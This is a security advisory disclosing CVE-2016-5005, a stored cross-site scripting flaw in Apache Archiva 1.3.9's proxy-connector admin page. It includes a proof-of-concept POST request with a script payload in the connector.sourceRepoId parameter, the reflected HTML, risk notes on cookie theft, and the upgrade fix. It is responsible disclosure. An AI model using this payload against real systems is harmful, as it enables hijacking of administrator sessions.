Apache Archiva 1.3.9 Cross Site Scripting

`RCE Security Advisory  
https://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
=======================  
Product: Apache Archiva  
Vendor URL: https://archiva.apache.org  
Type: Cross-Site Scripting [CWE-79]  
Date found: 2016-05-31  
Date published: 2016-07-11  
CVSSv3 Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)  
CVE: CVE-2016-5005  
  
  
2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
====================  
Apache Archiva v1.3.9  
older versions may be affected too.  
  
  
4. INTRODUCTION  
===============  
Apache Archiva™ is an extensible repository management software that helps  
taking care of your own personal or enterprise-wide build artifact  
repository. It is the perfect companion for build tools such as Maven,  
Continuum, and ANT.  
  
(from the vendor's homepage)  
  
  
5. VULNERABILITY DETAILS  
========================  
The script "/archiva/admin/addProxyConnector_commit.action" is vulnerable to  
an authenticated persistent Cross-Site Scripting vulnerability when user-  
supplied input to the HTTP POST parameter "connector.sourceRepoId" is  
processed by the web application. Since the application does not properly  
validate and sanitize this parameter, it is possible to place arbitrary  
script code permanently on the "Administration - Proxy Connectors" page as  
well as on the "Admin: Delete Proxy Connector" page.  
  
The following Proof-of-Concept triggers this vulnerability and adds a new  
proxy connector called "XSS<script>alert(document.cookie)</script>":  
  
POST /archiva/admin/addProxyConnector_commit.action HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101  
Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Cookie: JSESSIONID=1vabu6a1f9wye;  
rbkSignon=7574033ea6d44b4a9722cfa53a7b4001;  
_ga=GA1.2.1956020753.1461333249;  
__utma=86544839.1956020753.1461333249.1461575160.1461575160.1;  
__utmz=86544839.1461575160.1.1.utmcsr=premium_main|utmccn=(not%20set)|utmcmd=(not%20set)  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 567  
  
pattern=&connector.order=0&connector.proxyId=%28direct+connection%29&connector.sourceRepoId=XSS<script>alert(document.cookie)</script>&connector.targetRepoId=com.springsource.repository.bundles.external&connector.policies%5B%27propagate-errors-on-update%27%5D=always&connector.policies%5B%27cache-failures%27%5D=no&connector.policies%5B%27releases%27%5D=always&connector.policies%5B%27propagate-errors%27%5D=stop&connector.policies%5B%27checksum%27%5D=fail&connector.policies%5B%27snapshots%27%5D=always&propertyKey=&propertyValue=&blackListPattern=&whiteListPattern=  
  
The payload is then reflected on the "Administration - Proxy Connectors":  
  
<div class="managedRepo">  
<img src="/archiva/images/archiva-splat-32.gif">  
<p class="id">XSS<script>alert(document.cookie)</script></p>  
<p class="name"></p>  
</div>  
  
And on the "Admin: Delete Proxy Connector" page:  
  
<p>  
Are you sure you want to delete proxy connector <code>[  
XSS<script>alert(document.cookie)</script> ,  
maven2-repository.dev.java.net ]</code> ?  
</p>  
  
  
6. RISK  
=======  
To successfully exploit this vulnerability, a user with administrative  
rights must trick another authenticated user with administrative rights  
to visit one of the affected pages. Since this scenario is quite unlikely,  
the attack likelihood can be increased by combining this vulnerability  
with the Cross-Site Request Forgery vulnerability as described in  
RCESEC-2016-003 (CVE-2016-4469).  
  
The vulnerability allows remote attackers to permanently embed arbitrary  
script code into the context of the Apache Archiva administrative backend  
interface, which offers a wide range of possible attacks such as stealing  
cookies or attacking the browser and its components of a user visiting the  
page.  
  
  
7. SOLUTION  
===========  
Upgrade/Migrate to Apache Archiva 2.2.1  
  
  
8. REPORT TIMELINE  
==================  
2016-05-31: Discovery of the vulnerability  
2016-05-31: Notified vendor via public security mail address  
2016-06-06: No response, sent out another notification  
2016-06-10: Vendor states that this version is out of support  
2016-07-07: Vendor assigns CVE-2016-5005  
2016-07-11: Advisory released  
  
  
9. REFERENCES  
=============  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5005  
  
`